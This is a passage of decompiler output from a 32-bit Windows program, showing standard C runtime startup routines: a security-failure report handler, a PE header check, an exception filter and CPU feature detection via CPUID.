  int *v25; // [esp+CCh] [ebp-260h]
  __int16 v26; // [esp+D0h] [ebp-25Ch]
  int v27; // [esp+2D4h] [ebp-58h]
  int v28; // [esp+2D8h] [ebp-54h]
  int v29; // [esp+2E0h] [ebp-4Ch]
  struct _EXCEPTION_POINTERS ExceptionInfo; // [esp+324h] [ebp-8h]
  int savedregs; // [esp+32Ch] [ebp+0h]
  int retaddr; // [esp+330h] [ebp+4h]

  if ( IsProcessorFeaturePresent(0x17u) )
    __fastfail(a4);
  sub_401F00();
  v4 = memset(&Dst, 0, 0x2CCu);
  v20 = v4;
  v19 = v5;
  v18 = v6;
  v17 = a1;
  v16 = a3;
  v15 = a2;
  v26 = __SS__;
  v23 = __CS__;
  v14 = __DS__;
  v13 = __ES__;
  v12 = __FS__;
  v11 = __GS__;
  v7 = __readeflags();
  v24 = v7;
  v22 = retaddr;
  v25 = &retaddr;
  Dst = 65537;
  v21 = savedregs;
  memset(&v27, 0, 0x50u);
  v27 = 1073741845;
  v28 = 1;
  v29 = retaddr;
  v8 = IsDebuggerPresent();
  ExceptionInfo.ExceptionRecord = (PEXCEPTION_RECORD)&v27;
  ExceptionInfo.ContextRecord = (PCONTEXT)&Dst;
  v9 = v8 == 1;
  SetUnhandledExceptionFilter(0);
  if ( !UnhandledExceptionFilter(&ExceptionInfo) && !v9 )
    sub_401F00();
}

//----- (00401E70) --------------------------------------------------------
bool sub_401E70()
{
  HMODULE v0; // eax
  int v1; // ecx
  bool result; // al

  v0 = GetModuleHandleW(0);
  result = 0;
  if ( v0 )
  {
    if ( *(_WORD *)v0 == 23117 )
    {
      v1 = (int)v0 + *((_DWORD *)v0 + 15);
      if ( *(_DWORD *)v1 == 17744 && *(_WORD *)(v1 + 24) == 267 && *(_DWORD *)(v1 + 116) > 0xEu && *(_DWORD *)(v1 + 232) )
        result = 1;
    }
  }
  return result;
}

//----- (00401EB3) --------------------------------------------------------
LPTOP_LEVEL_EXCEPTION_FILTER sub_401EB3()
{
  return SetUnhandledExceptionFilter(TopLevelExceptionFilter);
}

//----- (00401EBF) --------------------------------------------------------
LONG __stdcall TopLevelExceptionFilter(struct _EXCEPTION_POINTERS *ExceptionInfo)
{
  PEXCEPTION_RECORD v1; // eax
  ULONG_PTR v2; // eax
  int savedregs; // [esp+0h] [ebp+0h]

  v1 = ExceptionInfo->ExceptionRecord;
  if ( ExceptionInfo->ExceptionRecord->ExceptionCode == -529697949 && v1->NumberParameters == 3 )
  {
    v2 = v1->ExceptionInformation[0];
    if ( v2 == 429065504 || v2 == 429065505 || v2 == 429065506 || v2 == 26820608 )
    {
      terminate(savedregs);
      __debugbreak();
      JUMPOUT(*(_DWORD *)sub_401F00);
    }
  }
  return 0;
}
// 402217: using guessed type int __stdcall terminate(_DWORD);

//----- (00401F00) --------------------------------------------------------
void sub_401F00()
{
  dword_404470 = 0;
}
// 404470: using guessed type int dword_404470;

//----- (00401F08) --------------------------------------------------------
int sub_401F08()
{
  _DWORD *v0; // esi
  int result; // eax

  v0 = &unk_40368C;
  if ( &unk_40368C < &unk_40368C )
  {
    do
    {
      if ( *v0 )
        result = ((int (__thiscall *)(_DWORD))*v0)(*v0);
      ++v0;
    }
    while ( v0 < (_DWORD *)&unk_40368C );
  }
  return result;
}

//----- (00401F34) --------------------------------------------------------
int sub_401F34()
{
  _DWORD *v0; // esi
  int result; // eax

  v0 = &unk_403694;
  if ( &unk_403694 < &unk_403694 )
  {
    do
    {
      if ( *v0 )
        result = ((int (__thiscall *)(_DWORD))*v0)(*v0);
      ++v0;
    }
    while ( v0 < (_DWORD *)&unk_403694 );
  }
  return result;
}

//----- (00401FBB) --------------------------------------------------------
int __cdecl sub_401FBB(int a1, int a2, int a3, int a4)
{
  return except_handler4_common(&__security_cookie, __security_check_cookie, a1, a2, a3, a4);
}
// 401566: using guessed type int __security_check_cookie();
// 402187: using guessed type int __cdecl except_handler4_common(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);

//----- (00401FDE) --------------------------------------------------------
int sub_401FDE()
{
  int v5; // edi
  int v11; // eax
  int v12; // edi
  int v13; // eax
  int v18; // eax
  int v20; // [esp+4h] [ebp-24h]
  int v21; // [esp+8h] [ebp-20h]
  int v22; // [esp+Ch] [ebp-1Ch]
  int v23; // [esp+10h] [ebp-18h]
  int v24; // [esp+14h] [ebp-14h]
  int v25; // [esp+18h] [ebp-10h]
  int v26; // [esp+1Ch] [ebp-Ch]
  int v27; // [esp+20h] [ebp-8h]
  int v28; // [esp+24h] [ebp-4h]

  dword_404474 = 0;
  dword_404010 |= 1u;
  if ( IsProcessorFeaturePresent(0xAu) )
  {
    v25 = 0;
    _EAX = 0;
    dword_404010 |= 2u;
    dword_404474 = 1;
    __asm { cpuid }
    v26 = _EAX;
    v5 = _EBX ^ 0x756E6547;
    v27 = _EDX ^ 0x49656E69;
    v28 = _ECX ^ 0x6C65746E;
    _EAX = 1;
    __asm { cpuid }
    v20 = _EAX;
    v21 = _EBX;
    v22 = _ECX;
    v23 = _EDX;
    if ( v5 | v27 | v28
      || (v11 = v20 & 0xFFF3FF0, (v20 & 0xFFF3FF0) != 67264)
      && v11 != 132704
      && v11 != 132720
      && v11 != 198224
      && v11 != 198240
      && v11 != 198256 )
    {
      v12 = dword_404478;
    }
    else
    {
      v12 = dword_404478 | 1;
      dword_404478 |= 1u;
    }
    v13 = v22;
    v28 = v22;
    if ( v26 < 7 )
    {
      LOBYTE(_EBX) = v25;
    }
    else
    {
      _EAX = 7;
      __asm { cpuid }
      v20 = _EAX;
      v13 = v28;
      v21 = _EBX;
      v22 = _ECX;
      v23 = _EDX;
      if ( _EBX & 0x200 )
        dword_404478 = v12 | 2;
    }
    if ( v13 & 0x100000 )
    {
      dword_404010 |= 4u;
      dword_404474 = 2;
      if ( v13 & 0x8000000 )
      {
        if ( v13 & 0x10000000 )
        {
          __asm { xgetbv }
          v24 = v13;
          v25 = _EDX;
          if ( (v13 & 6) == 6 )
          {
            v18 = dword_404010 | 8;
            dword_404474 = 3;
            dword_404010 |= 8u;
            if ( _EBX & 0x20 )
            {
              dword_404474 = 5;
              dword_404010 = v18 | 0x20;
            }
          }
        }
      }
    }
  }
  return 0;
}
// 40400C: using guessed type int dword_40400C;
// 404010: using guessed type int dword_404010;
// 404474: using guessed type int dword_404474;
// 404478: using guessed type int dword_404478;

//----- (00402175) --------------------------------------------------------
BOOL sub_402175()
{
  return dword_404014 != 0;
}
// 404014: using guessed type int dword_404014;

// ALL OK, 46 function(s) have been successfully decompiled
